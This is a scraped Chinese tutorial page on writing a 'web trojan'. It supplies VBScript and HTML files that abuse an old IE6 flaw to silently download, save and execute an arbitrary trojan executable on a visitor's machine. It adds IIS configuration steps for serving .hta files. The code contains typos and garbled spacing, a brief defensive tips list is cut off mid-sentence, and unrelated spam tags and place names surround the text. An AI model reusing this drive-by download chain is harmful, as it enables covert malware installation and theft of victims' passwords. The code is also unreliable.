佳木斯湛栽影视文化发展公司

主頁 > 知識庫 > 編寫網(wǎng)頁木馬詳解

編寫網(wǎng)頁木馬詳解

熱門標(biāo)簽:電子圍欄 阿里云 Mysql連接數(shù)設(shè)置 Linux服務(wù)器 服務(wù)器配置 銀行業(yè)務(wù) 團購網(wǎng)站 科大訊飛語音識別系統(tǒng)
我們經(jīng)常聽到這樣的忠告:“不要隨意下在不明的程序,不要隨意打開郵件的附件...”這樣的忠告確實是有用的,不過我們的系統(tǒng)有不少漏洞,許多木馬已經(jīng)不需要客戶端和服務(wù)端了,他們利用這些系統(tǒng)漏洞按照被系統(tǒng)認(rèn)為合法的代碼執(zhí)行木馬的功能,有的木馬會在你完全不知道的情況下潛入,現(xiàn)在我來講解下通過IE6的漏洞實現(xiàn)訪問網(wǎng)頁后神不知鬼不覺的下在并執(zhí)行指定程序的例子,也就是網(wǎng)頁木馬.



首先我們需要編寫幾個簡單的文件



一。名字為abc.abc的文件
html>

script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet=oReq.respomseBody

Savefile HttpDoGet,"c:win.exe"

End If

Set oReq=nothing

End Function

sub SaveFile(str.fName)

Set objStream = CreateObject("ADODB.Stream")

objStream.Type =1

objStream.Open

objStream.write str

objStream.SaveToFile fName.2

objStream.Close()

set objStream = nothing

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.exe",0)

b=wshshell.run ("cmd.exe /c del c:win.hta",0)

window.close

End Sub

HttpDoGet "http://127.0.0.1/test.exe"

/script>

/html>



其中test.exe為木馬程序,實現(xiàn)必須放在WEB發(fā)布的目錄下,文件abc.abc也必須保存在發(fā)布的目錄下。



二。名字為test.htm的文件

html>body>

木馬運行測試!(這句話可以改成你想說的)

object date="http://127.0.0.1/win.test";;;>/object>

/body>/html>



三。名字為win.test的文件

html>

body>

script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet,"c:win.hta"

Set oReq=nothing

End if

end function

sub SaveFile(str,fName)

Dim fso, tf

S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

Set tf = fso.CreateTextfile(fName,True)

tf.Write str

tf.Close

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.hat",0)

window.close

End Sub

HttpDoGet("http://127.0.0.1/abc.abc")

/script>

/body>

/html>


四。名字為test.exe的木馬程序。



...這個就不用我提供了吧,你想用什么木馬就把他的名字換成test.exe傳上去就可以了。



服務(wù)器的文件列表

test.htm:對外發(fā)布的網(wǎng)頁

win.test:下在文件abc.abc到對方機器上,并且保存為win.hta并且執(zhí)行。

abc.abc下載二進制的木馬文件test.exe,并執(zhí)行。

test.exe:木馬程序。



上面所說的文件可以修改成任意名字,只是不要忘記把源碼里的文件指向也修改就可以了!



最后是設(shè)置IIS,打開“程序→管理工具→internet服務(wù)管理器”,右鍵單擊要設(shè)置的站點,選擇《屬性》,在選擇“http頭”。單擊“MIME映射”里的“文件類型”按鈕,并在關(guān)聯(lián)擴展名文本框中輸入“.hta”,在內(nèi)容類型(MIME)中輸入“application/hta",然后關(guān)閉所有窗口就可以了。



有許多朋友多遇見過,說什么贈送Q號或者玩網(wǎng)游的時候里面有人喊贈送好東東在XXX網(wǎng)址,其實那上面所說的例子用的就是這種原理,不知不覺中你機器上的所有有關(guān)于密碼或者指定名詞的東西全發(fā)送到對方指定的郵件箱里去了



看完后是否覺得這種木馬太危險,甚至有種想把網(wǎng)線拔掉的感覺那?呵呵,其實了解了網(wǎng)頁木馬的工作原理后我們就不難防護他,看完以上內(nèi)容后就可以得出一個結(jié)論,網(wǎng)頁木馬主要利用IE的漏洞來實現(xiàn)的,所以在預(yù)防的時候一定要做到以下幾點就可以保證上網(wǎng)的安全了,

A。安裝IE的最新版本并且隨時下在才做系統(tǒng)和IE的補丁程序。

B。不隨便登陸不熟悉朋友送來的網(wǎng)站,對于熟悉的朋友也要小心哦。

C。不隨便登陸色情網(wǎng)站,還有一些賣

標(biāo)簽:萍鄉(xiāng) 衢州 廣元 衡水 棗莊 蚌埠 大理 江蘇

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《編寫網(wǎng)頁木馬詳解》,本文關(guān)鍵詞  ;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 收縮
    • 微信客服
    • 微信二維碼
    • 電話咨詢

    • 400-1100-266
    芦山县| 牡丹江市| 西安市| 遂昌县| 土默特右旗| 吉首市| 鹿邑县| 拜泉县| 建平县| 凤山市| 济宁市| 晋江市| 克拉玛依市| 嘉黎县| 亳州市| 琼结县| 太仆寺旗| 梧州市| 莫力| 河北区| 长春市| 五大连池市| 洪雅县| 富民县| 长阳| 弥勒县| 曲水县| 通城县| 芜湖县| 诏安县| 桃园县| 日土县| 民权县| 论坛| 庄浪县| 长沙市| 武川县| 阳信县| 盐津县| 都匀市| 英超|